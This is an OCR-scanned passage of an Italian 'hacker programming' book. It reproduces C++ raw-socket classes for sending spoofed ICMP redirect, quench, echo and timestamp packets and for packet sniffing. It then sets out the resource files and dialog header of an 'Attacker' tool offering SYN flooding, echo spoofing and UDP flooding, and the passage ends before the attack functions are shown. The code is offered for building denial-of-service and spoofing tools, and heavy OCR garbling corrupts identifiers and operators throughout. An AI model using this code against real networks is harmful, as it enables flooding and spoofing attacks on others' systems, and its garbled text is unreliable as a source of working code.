//And the checksum 

lpHead— >ICMPChecksum=CalculateChecksum ( (unsigned 
short *) lpHead, ICMPHeaderLength) ; 

//Send it 
BOOL bSend; 

bSend=CSpoof Socket : : Send (lpDestinationAddress, (char*) lpHead, ICMPHeaderLength) ; 

//Clear up 
delete lpHead; 
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return bSend; 

} 

ERROR_HANDLER_RETURN ( " SendParameter ", FALSE) 

} 

BOOL CICMPSocket : : SendQuench (LPCSTR lpDestinationAddress) 
{ 

try 
{ 

return Send (lpDestinationAddress, ICMP__Quench , 0) ; 

} 

ERROR_HANDLER_RETURN ( "SendQuench ", FALSE) 

} 

BOOL CICMPSocket :: SendRedirect (LPCSTR lpDestinationAddress, unsigned char cType, 

LPCSTR lpGatewayAddress) 

{ 

try 
l 

LPICMPHeader lpHead; 
lpHead=ConstructICMP () ; 

if (llpHead) 
{ 

ReportError ("SendRedirect" , "Failed to construct ICMP header!"); 
return FALSE; 

) 



lpHead->ICMPType=ICMP_Redirect ; 
lpHead->ICMPCode=cType ; 

lpHead->sICMP . sUL=inet_addr (lpGatewayAddress) ; 
//And the checksum 

lpHead—>ICMPChecksum=CalculateChecksum ( (unsigned 
short *) lpHead, ICMPHeaderLength) ; 

//Send it 
BOOL bSend; 

bSend=CSpoof Socket : : Send (lpDestinationAddress , (char*) lpHead, ICMPHeaderLength) ; 

//Clear up 
delete lpHead; 

return bSend; 

} 

ERROR_HANDLER_RETURN ( "SendRedirect ", FALSE) 

) 



BOOL CICMPSocket :: SendEcho (LPCSTR lpDestinationAddress, BOOL bReply, unsigned short 

usldentifier, unsigned short usSequence, unsigned long ulData) 

{ 

try 
{ 

LPICMPHeader lpHead; 
lpHead=ConstructICMP () ; 



if (HpHead) 
{ 

ReportError ( "SendEcho" , "Failed to construct ICMP header!"); 
return FALSE; 

) 



//Check if echo or reply 
if (bReply) 

lpHead->ICMPType=ICMP_Echo_Reply; 

else 

lpHead->ICMPType=ICMP_Echo ; 
lpHead->ICMPCode=0 ; 

lpHead->sICMP . sUS . usl=htons (usldentifier) ; 
lpHead->sICMP . sUS. us2=htons (usSequence) ; 
lpHead— >ICMP_Originate_Timestamp=htonl (ulData) ; 

//And the checksum 

lpHead— >ICMPChecksum=CalculateChecksum ( (unsigned 
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//Send it 
BOOL bSend; 

bSend=CSpoof Socket : : Send (lpDestinationAddress, (char*) lpHead, ICMPHeaderLength) ; 

//Clear up 
delete lpHead; 

return bSend; 

} 

ERROR_HANDLER_RETURN ( "SendEcho ", FALSE) 



} 



BOOL CICMPSocket : : SendTlmestamp (LPCSTR lpDestinationAddress, BOOL bReply, unsigned 
short usldentifier, unsigned short usSequence, unsigned long ulOriginateTimestamp , 
unslgned long ulReceiveTimestamp, unsigned long ulTransmitTimestamp) 
{ 

try 
l 

LPICMPHeader lpHead; 
lpHead=ConstructICMP () ; 

if (UpHead) 
{ 

ReportError (" SendTlmestamp" , "Failed to construct ICMP header!"); 
return FALSE; 

ì 

//Check if echo or reply 
if (bReply) 

lpHea d-> ICMP Type=ICMP_ Times t amp_Reply ; 

else 

lpHead->ICMPType=ICMP_Timestamp ; 
lpHead->ICMPCode=0 ; 

lpHead->sICMP . sUS. usl=htons (usldentifier) ; 
lpHead->sICMP . sUS. us2=htons (usSequence) ; 

lpHead— >ICMP_Originate_Timestamp=htonl (ulOriginateTimestamp) ; 
lpHead- >ICMP_Receive_Timestamp=htonl (ulReceiveTimestamp) ; 
lpHead— >ICMP_Transmit_Timestamp=htonl (ulTransmitTimestamp) ; 

//And the checksum 

lpHead— >ICMPChecksum=CalculateChecksum ( (unsigned 
short *) lpHead, ICMPHeaderLength) ; 

//Send it 
BOOL bSend; 

bSend=CSpoof Socket : : Send (lpDestinationAddress, (char*) lpHead, ICMPHeaderLength) ; 

//Clear up 
delete lpHead; 

return bSend; 

} 

ERROR_HANDLER_RETURN ( "SendTlmestamp ", FALSE) 

) 

BOOL CICMPSocket : : Sendlnformation (LPCSTR lpDestinationAddress, BOOL bReply, unsigned 

short usldentifier, unsigned short usSequence) 

{ 



try 
( 



header!"); 



LPICMPHeader lpHead; 
lpHead=ConstructICMP () ; 

if (HpHead) 
{ 

ReportError ( "Sendlnformation" , "Failed to construct ICMP 
return FALSE; 



//Check if echo or reply 
if (bReply) 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



else 

lpHea d-> ICMP Type=ICMP__ Informa tion; 
lpHead->ICMPCode=0 ; 

lpHead->s ICMP . sUS. usl=htons (usldentifier) ; 
lpHead->sICMP . sUS. us2=htons (usSequence) ; 

//And the checksum 
//Using only first 8 bytes 

lpHead— >ICMPChecksum=CalculateChecksum ( (unsigned 
short *) lpHead, ICMP_Information_SIZE) ; 

//Send it 
BOOL bSend; 



ZE); 



bSend=CSpoof Socket : : Send (lpDestinationAddress, (char*) lpHead, ICMP_Information_SI 

//Clear up 
delete lpHead; 

return bSend; 

} 

ERROR_HANDLER_RETURN ( "SendTimestamp ", FALSE) 



BOOL CICMPSocket: : ProccessICMP (char* buf) 
{ 

try 
{ 

//Here we proccess the input we received 
//Initialize members 
if (!m_IPHeader) 

m__IPHeader=new IpHeader; 

if (!m_ICMPHeader) 

m_ICMPHeader=new ICMPHeader; 

//Create an IP header 
LPIpHeader lpHead; 
lpHead=m_IPHeader ; 

//Copy to buffer 

memcpy (lpHead, buf, IpHeaderLength) ; 

//Let ' s check for options 
unsigned char ucHeaderSize; 

ucHeaderSize=lpHead->HeaderLength_Version S 15; 
ucHeaderSi ze *=4 ; 

//Now check for total packet size 
unsigned short ucPacketSize; 
ucPacketSize=htons (lpHead— >TotalLength) ; 

//Copy data to icmp 

memset (m_ICMPHeader , 0, ICMPHeaderLength) ; 

//How much to copy ? 

unsigned short ucCopy; 

ucCopy=ucPacketSize-ucHeaderSize; 

//Save the datasize 
m_Dat aSi ze=ucCopy; 

if (ucCopy>ICMPHeaderLength) 

ucCopy=ICMPHeaderLength ; 

memcpy (m_ICMPHeader, buf+ucHeaderSize, ucCopy) ; 

//Now save the originai IP 

if (m_ICMPHeader->ICMPType ! =ICMP_Echo SS 

m_ICMPHeader->ICMPType ! =ICMP_Echo_Reply SS 
m_ICMPHeader->ICMPType ! =ICMP_Timestamp SS 
m_ICMPHeader->ICMPType ! =ICMP_Timestamp_Reply SS 
m_ICMPHeader->ICMPType ! =ICMP_Information SS 
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{ 

if ( !m_ICMPIPHeader) 

m_ICMPIPHeader=new IpHeader; 

memcpy (m_ICMPIPHeader, buf+ucHeaderSize+ICMP_Unreachable_SIZE, IpHeaderLength) ; 

//Copy rest of data 
if (!m_Data) 

m_Data=new char [ICMP_DATA_SIZE] ; 

memcpy (m__Data, buf+ucPacketSize-ICMP_DATA__SIZE, ICMP_DATA_SIZE) ; 

} 

//Now I need to reverse the header 
ReverseHeader () ; 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "ProccessICMP ", FALSE) 

const LPICMPHeader CICMPSocket : : GetLast ICMPHeader () 

//Return the last header proccessed 
return m ICMPHeader; 

const LPIpHeader CICMPSocket :: GetLastlPHeader ( ) 
return m_IPHeader; 

unsigned long CICMPSocket :: GetLastDataSize () 
return m_DataSize; 

void CICMPSocket : : ReverseHeader ( ) 

try 
{ 

//Reverse timestamps 

if (m_ICMPHeader->ICMPType==ICMP_Timestamp / / m_ICMPHeader- 
>ICMPType==ICMP_ Timestamp_Reply) 
{ 

m_ICMPHeader->ICMP_Originate_Timestamp=htonl (m_ICMPHeader- 
>ICMP_Originate__Timestamp) ; 

m_ ICMPHeader->ICMP_Receive_ Timest amp=htonl (m_ ICMPHeader- 
>ICMP__Receive Timestamp) ; 

m_ ICMPHeader->ICMP_ Transmi t_ Timestamp=ht onl (m_ ICMPHeader- 
>ICMP_Transmit_Timestamp) ; 
ì 

//Reverse ID and Sequence 

if (m_ICMPHeader->ICMPType==ICMP_Echo / / m_ICMPHeader- 
>ICMPType==ICMP_Echo_Reply) 
{ 

m_ICMPHeader->sICMP . sUS . usl=htons (m_ICMPHeader->sICMP . sUS . usi) ; 
m_ICMPHeader->sICMP . sUS . us2=htons (m_ICMPHeader->sICMP . sUS . us2) ; 

) 

} 

ERROR_HANDLER ( "ReverseHeader") 

ì 

const LPIpHeader CICMPSocket : : GetLastlCMPIPHeader () 
{ 

//Get the IP header received via the icmp 
return m_ICMPIPHeader; 

} 

const char* CICMPSocket : : GetLast ICMPData () 
{ 

//Get the data sent via the ICMP 
return m_Data; 
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Base C 1 a s s e s 



CSpoofSocket 



Data I t e m . 



char * 



m Data 



unsigned short m_DataSize 

LPICMPHeader m_ ICMPHeader 
LPIpHeader 
LPIpHeader 



m_ ICMPIPHeader 
m_IPHeader 



The data 
The data slze 
The ICMP header 
The ICMP IP header 
The IP header 



Constructors 



CICMP Socket () 



et or and dtor 



Destructors 



virtual 



•CICMPSocket () 



Functions 



virtual LPICMPHeader ConstructICMP () 



virtual BOOL 
unsigned long 

const char * 

const LPICMPHeader 

const LPIpHeader 

const LPIpHeader 

virtual BOOL 

void 

BOOL 

BOOL 
BOOL 
BOOL 



Create () 

GetLastDataSize () 
GetLastICMPData () 
GetLastlCMPHeader Q 
GetLastlCMPIPHeader Q 
GetLastlPHeader Q 
ProccessICMP ( char* buf ) 
ReverseHeader ( ) 

Send ( LPCSTR lpDestinationAddress, 
unsigned char cICMP, unsigned char 
cType ) 

SendEcho ( LPCSTR lpDestinationAddress, 
BOOL bReply, unsigned short 
usldentifier, unsigned short 
usSequence, unsigned long ulData ) 

Sendlnformation ( LPCSTR 
lpDestinationAddress , BOOL bReply, 
unsigned short usldentifier, unsigned 
short usSequence ) 

SendParameter ( LPCSTR 
lpDestinationAddress, unsigned char 
cError ) 



Construct an ICMP 
header 

Create an ICMP socket 

Get the last ICMP 
header size 

Get the last ICMP 
data 

Get the last ICMP 
header 

Get the last ICMP - 
IP header 

The the last IP 
header 

Proccess incoming 
ICMP data 

Reverse the header 
(big little endian) 

Send the data 



Send ICMP messages 
according to the name 
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BOOL SendQuench ( LPCSTR 

lpDestinationAddress ) 

BOOL SendRedirect ( LPCSTR 

lpDestinationAddress, unsigned char 
cType, LPCSTR lpGatewayAddress ) 

BOOL SendTime ( LPCSTR lpDestinationAddress , 

unsigned char cType ) 

BOOL SendTimestamp ( LPCSTR 

lpDestinationAddress, BOOL bReply, 
unsigned short usldentifier, unsigned 
short usSequence, unsigned long 
ulOriginateTimestamp , unsigned long 
ulReceiveTimestamp, unsigned long 
ulTransmitTimestamp ) 

BOOL SendUnreachable ( LPCSTR 

lpDestinationAddress, unsigned char 
cType ) 



^include "AsyncSocket . h " 
iinclude "ICMPSocket . h " 

class CICMPSocketAsync : 

public CICMPSocket, 
public CAsyncSocket 

{ 

public : 

//Close the socket 
virtual BOOL Close () ; 



//Create the ICMP socket 
virtual BOOL Create () ; 



//ctor and dtor 
CICMPSocketAsync () ; 
virtual ~CICMPSocketAsync () ; 
protected: 

//Go to async mode 
virtual BOOL SetAsync () ; 

/ /Handle incoming data 

virtual BOOL OnSocketReceive (int iErrorCode) ; 

//Get the socket handle 

virtual SOCKET GetAsyncHandle () ; 

}; 

^include "stdafx.h" 
^include " ICMP Socket Async . h " 

////////////////////////////////////////////////////////////////////// 
// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

CICMPSocketAsync : .-CICMPSocketAsync () 

{ 

} 

CICMPSocketAsync : : "CICMPSocketAsync ( ) 
{ 

//We need to close it here 

try 

{ 

Close () ; 

} 

ERROR_HANDLER_AMBIG (CSpoof Socket, " ~CICMPSocketAsync" ) 

} 

BOOL CICMPSocketAsync : : SetAsync () 
{ 

try 
{ 

//Set event to read / write / close / oob 
int iResult; 
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±Result=WSAAsyncSelect (GetHandle () , GetWindowHandle () , WM__SOCKET_GENERAL , FD_WRITE 
I FD_READ) ; 

if (iResult) 
{ 

CICMPSocket : : SetLastError ( "SetAsync ") ; 
return FALSE; 

ì 

return TRUE; 

} 

ERROR_HANDLER_AMBIG_RETURN ( CSpoof Socket , "SetAsync" , FALSE) 

} 

BOOL CICMPSocketAsync : : OnSocketReceive (int iErrorCode) 
{ 

try 
{ 

//fiere we receive the data 

if ( ! iErrorCode) 

{ 

//Buffer 
char* buf; 

buf=new char [ICMF_BUF] ; 

//Read the data 
int iRead; 

iRead=Receive (buf, ICMP_BUF) ; 

BOOL bResult=FALSE ; 

//Only if not an error 
if (iRead !=SOCKET_ERROR) 

bResult=ProccessICMP (buf) ; 

//Clean up 
delete [] buf; 
return bResult; 



} 

else 

return FALSE; 

} 

ERROR_HANDLER_AMBIG__RETURN (CSpoof Socket, "OnSocketReceive ", FALSE) 



BOOL CICMPSocketAsync: : Create () 
{ 

try 
{ 



socket ! ") ; 



if (! CICMPSocket : .-Create () ) 
{ 

CICMPSocket: -.ReportError ("Create" , "Failed to create ICMP 
return FALSE; 

} 

AddSocketToList () ; 
return SetAsync () ; 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoof Socket , "Create ", FALSE) 

) 

SOCKET CICMPSocketAsync : : GetAsyncHandle ( ) 
{ 

return GetHandle () ; 

} 

BOOL CICMPSocketAsync :: Close ( ) 
{ 

try 
{ 

//Quit if not ok 
if (IValidSocket () ) 
return FALSE; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



RemoveSocketFromList () ; 
return CICMP Socket : : Close () ; 

} 

ERROR_HANDLER_AMBIG_RETURN ( CSpoof Socket , "Close ", FALSE) 



Base C 1 a s s e s 



CICMPSocket 
CAsyncSocket 



Constructors 



CICMP Socket Async () 



Construction/Destruction 



Destructors 



virtual 



-CICMP SocketAsync () 



Functions 



virtual BOOL 
virtual BOOL 
virtual SOCKET 
virtual BOOL 
virtual BOOL 



Close () 
Create () 

GetAsyncHandle ( ) 

OnSocketReceive ( int iErrorCode ) 
SetAsync ( ) 



Close the socket 
Create the ICMP socket 
Get the socket handle 
Handle incoming data 
Go to async mode 



iinclude " Spoof Socket . h " 
^include "AsyncSocket . h " 

class CSniff Socket : 

public CSpoof Socket , 
public CAsyncSocket 

{ 

public: 

//Create the socket 
BOOL Create (); 

//et or and dtor 
CSniffSocket {) ; 
virtual ~CSniff Socket () ; 

//Turn to be a sniffer socket 
virtual BOOL Sniff (BOOL bSniff); 
protected: 

//Get the socket handle 

virtual SOCKET GetAsyncHandle () ; 

//Go to async mode 
virtual BOOL SetAsync () ; 

NO_OnSocketTimeout 

NO_OnSocketConnect 

NO_OnSocketAccept 

NO_OnSocketClose 

NO_OnSocketOOB 

NO_OnSocketWrite 



#include "stdafx.h" 
iinclude "Sniff Socket . h " 
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////////////////////////////////////////////////////////////////////// 

// Construction/Destruction 

////////////////////////////////////////////////////////////////////// 

CSni f f Socket : :CSniff Socket () : CSpoof Socket () , CAsyncSocket ( ) 

{ 

} 

CSniff Socket : : ~CSniff Socket ( ) 
{ 

RemoveSocketFromLlst () ; 

} 

BOOL CSniff Socket :: Sniff (BOOL bSniff) 
i 

try 
{ 

if (CSpoofSocket : : Sniff (bSniff) ) 
return 

IWSAAsyncSelect (GetHandle () , GetWindowHandle () , WM_SOCKET_GENERAL , FD^READ) ; 
else 

return FALSE; 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoofSocket, "Sniff", FALSE) 

} 



BOOL CSniffSocket : : Create {) 
{ 

try 
{ 



SetProtocol (IPPROTO_IP) ; 

if (CSpoofSocket : : Create (IPPROTO_IP) ) 

{ 

AddSocketToList () ; 
return TRUE; 

ì 

else 

return FALSE; 

} 

ERROR_HANDLER_AMBIG_RETURN (CSpoofSocket, "Create ", FALSE) 



} 



SOCKET CSniffSocket : : GetAsyncHandle () 
{ 

return GetHandle () ; 

} 

BOOL CSni ff Socket :: SetAsyncO 
{ 

//Do nothing 
return TRUE; 



Base C 1 a s s e s 



CSpoofSocket 
CAsyncSocket 

I Constructors 



CSniffSocket () 



Construction/Destruction 



Destructors 



virtual 



~CSniffSocket () 
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Functions 



BOOL Create () Create the socket 

virtual SOCKET GetAsyncHandle () Get the socket handle 

virtual BOOL SetAsync ( ) Go to async mode 

virtual BOOL Sniff ( BOOL bSniff ) Turn to be a sniffer socket 



Questa raccolta di classi permette la scrittura di moltissime Utilities di qualsiasi tipo a partire 
da i normalissimi PING per arrivare a funzioni di spoofing. 

Chiaramente le classi devono essere compilate mediante un compilatore come Visual Studio 
e inserite all'interno dei programmi per i quali devono inoltre essere create le interfaccie 
utente per l'inserimento dei dati come ad esempio gli IP di destinazione, le porte ecc. 
Vediamo subito qualche esempio di programma scritto utilizzando queste classi. 
Il primo viene chiamato ATTACKER in quanto permette di eseguire tre tipologie di attacco 
differenti e precisamente : 



SYN attack 
ECHO spoof 
UDP Flooding 



La maschera dovrà avere la seguente interfaccia. 



kamodia ilimp library 



JSJxl 



Scuica IP: 
Desthafion IP: 
D [ficus — 



C EdlDSpDOl 

r UDPFIcadru 



Nmnbef of packets 



Sgnd j 



Quii 



Pnl |Q 
Pul lo" 



r IP attóre 
r TCP celare 



Questa è definita dentro al file delle risorse : 



iinclude "resource.h" 

idefine APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generated f rotti the TEXTINCLUDE 2 resource. 

// 

^include "afxres.h" 

///////////////////////////////////////////////////////////////////////////// 
§undef APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////////////// 
// English (U.S.) resources 

#if ! defined (AFX_RESOURCE_DLL ) Il defined(AFX_TARG_ENU) 
iifdef _WIN32 

LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US 
ipragma code _page (1252) 
tendi f //_WIN32 

///////////////////////////////////////////////////////////////////////////// 
// 

// Dialog 

// 
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IDD_ABOUTBOX DIALOG DISCARDABLE 0, 0, 235, 90 

STYLE DS_MODALFRAME / WS_POPUP / WS_CAPTION / WS_SYSMENU 

CAPTION "About Attacker" 

FONT 8, "MS Sans Serif" 

BEGIN 

IDR_MAINFRAME, IDC_STATIC, 11, 17, 20, 20 
"Attacker Version 1 . 0", IDC_STATIC, 40, 10, 119, 8, 
SS_NOPREFIX 

"Copyright (C) 2001, Komodia Inc. ", IDC_STATIC, 40, 25, 119, 
8 

"OK", IDOK,178, 7, 50, 14, WS_GROUP 

"http://www.komodia.com", IDC_STATIC, 40, 38, 119, 8 
"barak@komodia.com", IDC_STATIC, 39, 50, 119, 8 
END 



ICON 
LTEXT 



LTEXT 



DEFPUSHBUTTON 

LTEXT 

LTEXT 



IDD_ATTACKER_DIALOG DIALOGEX 0, 0, 320, 142 

STYLE DS_MODALFRAME / WS_MINIMIZEBOX / WS_MAXIMIZEBOX / WS^POPUP / 

WS_VISIBLE I WS^CAPTION / WS^SYSMENU 
EXSTYLE WS_EX_APPWINDOW 
CAPTION "Komodia TCP/IP library" 
FONT 8, "MS Sans Serif", 0, 0, Oxl 
BEGIN 

CONTROL "IPAddressl ", IDC_SOURCEIP, "SysIPAddress32 ", WS_ TABSTOP, 71 , 

22,158,14 

EDITTEXT IDC^SOURCEPORT, 267, 21,37, 12, ES_AUTOHSCROLL 

CONTROL "IPAddressl", IDC_DESTINATIONIP, "SysIPAddress32" , 

WS_TABSTOP, 71, 38, 158, 14 
EDITTEXT IDC_DESTINATIONPORT, 267, 38, 37, 12, ES_AUTOHSCROLL 

CONTROL "Syn attack", IDC SYNATTACK, "Button" , BS_AUTORADIOBUTTON / 

WS_GROUP I WS_TABSTOP, 26, 77 ,105,13 
CONTROL "Echo spoof" , IDC_ECHOSPOOF , "Button" , BS_AUTORADIOBUTTON, 

25, 91, 105, 13 

CONTROL "UDP Flooding" , IDC_UDPFLOOD, "Button" , BS_AUTORADIOBUTTON, 

25, 106, 105, 13 

EDITTEXT IDC_PACKETS, 143 , 76, 59, 14 , ES_AUTOHSCROLL 

CONTROL "IP options", IDC_IPOPTIONS, "Button", BS_AUTOCHECKBOX / 

WS_TABSTOP, 227, 78, 74, 10 
CONTROL "TCP options" , IDC_TCPOPTIONS, "Button" , BS_AUTOCRECKBOX / 

WS_TABSTOP, 22 7, 90, 74, 10 
DEFPUSHBUTTON "Send", IDC_SEND, 144, 95, 50, 12 
PUSHBUTTON "Quit ", IDQuit , 144, 110, 50, 14 

LTEXT "Source IP : ", IDC_sSOURCEIP, 13, 24, 49, 12 

LTEXT "Destination IP : " , IDC__sDESTINATIONIP , 14 , 41, 51, 12 

GROUPBOX "Options ", IDC_STATIC, 17,61, 122, 64 

LTEXT "Number of packets ", IDC_STATIC, 143, 65, 65, 8 

LTEXT "Port ", IDC_STATIC, 239, 23, 25, 8 

LTEXT "Port ", IDC_STATIC, 239, 40, 25, 8 

END 



iifndef _MAC 

///////////////////////////////////////////////////////////////////////////// 
// 

// Version 

// 

VS_VERSION_INFO VERSIONINFO 

FILEVERSION 1,0,0,1 

PRODUCTVERSION 1,0,0,1 

FILEFLAGSMASK 0x3fL 
iifdef _DEBUG 

FILEFLAGS OxlL 
#else 

FILEFLAGS OxOL 
iendif 

FILEOS 0x4L 

FILETYPE OxlL 

FILESUB TYPE OxOL 
BEGIN 

BLOCK "StringFilelnfo " 
BEGIN 

BLOCK "040904B0" 

BEGIN 

VALUE "CompanyName" , "\0" 

VALUE "FileDescription" , "Attacker MFC Application\0" 
VALUE "FileVersion", "1, 0, 0, 1\0" 
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VALUE "LegalCopyright", "Copyright (C) 2000\0" 
VALVE "LegalTrademarks", "\0" 
VALUE "OriginalFilename", "Attacker . EXE\0" 
VALUE "ProductName", "Attacker Application\0" 
VALUE "ProductVersion", "1, 0, 0, 1\0" 

END 

END 

BLOCK "VarFilelnfo" 
BEGIN 

VALUE " Trans lat ion" , 0x409, 1200 

END 

END 

iendif // !_MAC 



///////////////////////////////////////////////////////////////////////////// 
// 

// DESIGNINFO 

// 

iifdef APSTUDIO_INVOKED 
GUIDELINES DESIGNINFO DISCARDABLE 
BEGIN 

IDD__ABOUTBOX, DIALOG 
BEGIN 

LEFTMARGIN, 7 
RIGHTMARGIN, 228 
TOPMARGIN, 7 
BOTTOMMARGIN, 83 

END 

IDD_ATTACKER_DIALOG, DIALOG 
BEGIN 

LEFTMARGIN, 7 

RIGHTMARGIN, 313 

TOPMARGIN, 7 

BOTTOMMARGIN, 135 

END 

END 

iendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// String Table 

// 

STRINGTABLE DISCARDABLE 
BEGIN 

IDS_ABOUTBOX "SAbout Attacker. . . " 

IDP_SOCKETS_INIT_FAILED "Windows sockets initialization failed. " 

END 

iendif // English (U.S.) resources 

///////////////////////////////////////////////////////////////////////////// 



///////////////////////////////////////////////////////////////////////////// 
// Unknown language: OxD, Oxl resources 

#if !defined(AFX_RESOURCE_DLL) Il defined(AFX_TARG_HEB) 
iifdef _WIN32 
LANGUAGE OxD, Oxl 
ipragma code _page (1255) 
iendif //_WIN32 

iifdef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// TEXTINCLUDE 

// 

1 TEXTINCLUDE DISCARDABLE 
BEGIN 

"resource.h\0" 
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2 TEXTINCL UDE DISCARDABLE 
BEGIN 

"iinclude " "afxres .h""\r\n" 
"\0" 

END 

3 TEXTINCL UDE DISCARDABLE 
BEGIN 

"idefine _AFX_NO_SPLITTER_RESOURCES\r\n " 
"idefine _AFX_NO_OLE_RESOURCES\r\n " 
"ideflne _AFX_NO_TRACKER_RESOURCES\r\n " 
"ideflne _AFX_NO_PROPERTY_RESOURCES\r\n " 
"\r\n" 

"iif ! defined (AFX_RESOURCE_DLL) Il defined (AFX_TARG_ENU)\r\n" 

"iifdef _WIN32\r\n" 

"LANGUAGE 9, l\r\n" 

"ipragma code_page (1252) \r\n" 

"iendlf //_WIN32\r\n" 

"iinclude " "res\\Attacker. rc2" " // non-Microsoft Visual C++ edited resources\r\n" 

"iinclude " "afxres . re" " // Standard components\r\n" 

"iendif\r\n" 

"\0" 

END 

iendif // APSTUDIO_INVOKED 



///////////////////////////////////////////////////////////////////////////// 
// 

// Icon 

// 

// Icon with lowest ID value placed first to ensure application icon 
// remains consistent on ali systems. 

IDR_MAINFRAME ICON DISCARDABLE "Attacker . ico" 

///////////////////////////////////////////////////////////////////////////// 
// 

// Bitmap 

// 

iendif // Unknown language: OxD, Oxl resources 

///////////////////////////////////////////////////////////////////////////// 



iifndef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////////////// 
// 

// Generated front the TEXTINCLUDE 3 resource. 

// 

idefine _AFX_NO_SPLITTER_RESOURCES 
idefine _AFX_NO_OLE_RESOURCES 
idefine _AFX_NO_ TRACKER_RESOVRCES 
idefine _AFX__NO_PROPERTY__RESOURCES 

iif ! defined (AFX_RESOURCE_DLL) Il defined (AFX_TARG__ENU) 

iifdef _WIN32 

LANGUAGE 9, 1 

ipragma code page (1252) 

iendif //_WIN32 

iinclude "Attacker . rc2 " // non-Microsoft Visual C++ edited resources 

iinclude "afxres . re" // Standard components 

iendif 

///////////////////////////////////////////////////////////////////////////// 
iendif // not APSTUDIO_INVOKED 



Il file resource. h contiene : 



//{ { NO_DEPENDENCIES } } 

// Microsoft Developer Studio generated include file. 
// Used by Attacker. re 
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// 






idefine 


IDM_ABOUTBOX 


0x0010 


idefine 


IDD_ABOUTBOX 


100 


idefine 


IDS_ABOUTBOX 


101 


idefine 


IDD_ATTACKER_DIALOG 


102 


idefine 


IDP_SOCKETS_INIT_FAILED 


103 


idefine 


IDR_MAINFRAME 


128 


idefine 


IDB KOMODIA 


132 


idefine 


IDC^SEND 


1000 


idefine 


IDQuit 


1001 


idefine 


IDC_SOURCEIP 


1002 


idefine 


IDC^sSOURCEIP 


1003 


idefine 


IDC_DESTINATIONIP 


1004 


idefine 


IDC_sDESTINATIONIP 


1005 


idefine 


IDC_SYNATTACK 


1006 


idefine 


IDC_ECHOSPOOF 


1007 


idefine 


IDC_UDPFLOOD 


1008 


idefine 


IDC_PACKETS 


1009 


idefine 


IDC^SOURCEPORT 


1010 


idefine 


IDC__DESTINATIONPORT 


1011 


idefine 


IDC_IPOPTIONS 


1012 


idefine 


IDC_ TCPOP TIONS 


1013 


// Next 


default values for new objects 




// 






Hfdef APSTUDIO_INVOKED 




Hfndef 


APSTUDIO_READONLY_SYMBOLS 




idefine 


_APS_NEXT_RESOURCE_VALUE 


133 


idefine 


_APS_NEXT_ COMMAND_ VALVE 


32111 


idefine 


_APS_NEXT_CONTROL_VALUE 


1013 


idefine 


_APS_NEXT_SYMED_VALUE 


101 


iendif 







Alla dialog definita dentro al file di risorse idd_attacker_dialog sono asociati i files .cpp 
e .h che contengono le funzioni di gestione della dialog stessa. 



// AttackerDlg.h 

Hf ! defined (AFX_ATTACKERDLG_H 8456DC89_941E_41AF_9892_DA13C912DBF4 INCLUDED) 

idefine AFX_ATTACKERDLG_H 8456DC89_ 94 1E_41AF_ 9892_DA1 3C9 12DBF4 INCLUDED_ 

Hf _MSC_VER > 1000 
ipragma once 

iendif // _MSC__VER > 1000 

///////////////////////////////////////////////////////////////////////////// 
// CAttackerDlg dialog 

idefine ATTACK_SYN 0 
idefine ATTACK_ECHO 1 
idefine ATTACK^UDP 2 

idefine ERROR_INVALID_SOURCE "Invalid source IP address" 

idefine ERROR_INVALID_DESTINATION "Invalid destination IP address" 

class CSpoof Socket ; 

class CAttackerDlg : public CDialog 
{ 

// Construction 
public: 

CAttackerDlg (CWnd* pParent = NULL) ; // standard constructor 

// Dialog Data 

//{ {AFX_DATA (CAttackerDlg) 
enum { IDD = IDD_ATTACKER_DIALOG }; 
CIPAddressCtrl m_SourceIP; 
CIPAddressCtrl m_DestinationIP ; 



int mPackets; 

short m_SourcePort ; 

short m DestinationPort; 
int m_AttackType; 

BOOL m_TcpOptions ; 

BOOL m_IPOptions ; 
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//} }AFX_DATA 

// ClassWlzard generateci virtual function overrides 

// { (AFX_VIRTUAL (CAttackerDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
protected: 

void DisplaySocketError (CSpoof Socket* sock) ; 
HICON m_hIcon; 

// Generated message map functions 
//{ (AFX_MSG (CAttackerDlg) 
virtual BOOL OnlnitDialog () ; 

afx_msg void OnSysCommand (UINT nID, LPARAM lParam) ; 
afx_msg void OnPaintf); 
afx_jxisg HCURSOR OnQueryDraglcon ( ) ; 
afx__msg void OnSendf); 
afx_msg void OnQuit () ; 
//} }AFX_MSG 
DECLARE_MESSAGE_MAP () 
private: 

void SetlPOptions (CSpoof Socket* sok) ; 
void EchoAttack () ; 
void UDPFlood () ; 

LPSTR IPCtrlToSTR(CIPAddressCtrl* etri) ; 
void SynFlood() ; 

}; 

//{ (AFX_INSERT_LOCATION) ) 

// Microsoft Visual C++ will insert additional declarations immediately before the 
previous line . 

iendif // Idefined (AFX__ATTACKERDLG_H 8456DC89_947E_41AF_9892_DA13C972DBF4 INCLUDED_) 

// Atta ckerDl g . epp 

iinclude "stdafx.h" 
iinclude "Attacker.h" 
iinclude "AttackerDlg . h" 

^include " . . \Spoof Socket . h " 
iinclude " . . \ UDPSocket . h " 
iinclude " . . \ TCPSocket . h " 

Hfdef _DEBUG 
idefine new DEBUG_NEW 
iundef THIS_FILE 

static char THIS_FILE[] = FILE ; 

iendif 

///////////////////////////////////////////////////////////////////////////// 
// CAboutDlg dialog used for App About 

class CAboutDlg : public CDialog 
{ 

public: 

CAboutDlg () ; 

// Dialog Data 

//{ {AFX_DATA (CAboutDlg) 
enum { IDD = IDD_ABOUTBOX } ; 
//} }AFX_DATA 

// ClassWlzard generated virtual function overrides 

//{ {AFX_VIRTUAL (CAboutDlg) 

protected: 

virtual void DoDataExchange (CDataExchange* pDX) ; // DDX/DDV support 
//} }AFX_VIRTUAL 

// Implementation 
